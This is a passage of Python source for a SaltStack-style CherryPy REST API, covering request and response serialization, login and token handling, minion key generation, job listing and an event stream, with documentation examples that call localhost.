functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
cherrypy.serving.request.unserialized_data = dict(parse_qsl(urlencoded))
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if 'tgt_type' in chunk:
if chunk['tgt_type'] == 'ipcidr':
raise cherrypy.HTTPError(401, 'ipcidr is not supported now')
if chunk['tgt_type'] == 'compound' and 'S@' in chunk['tgt']:
raise cherrypy.HTTPError(401, 'S@ is not supported now')
if 'username' in chunk:
username = chunk['username']
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
if "return" in returns[minion]:
minion_ret[minion] = returns[minion].get("return")
else:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
elif token['eauth'] == 'rest':
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{}', and user '{}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
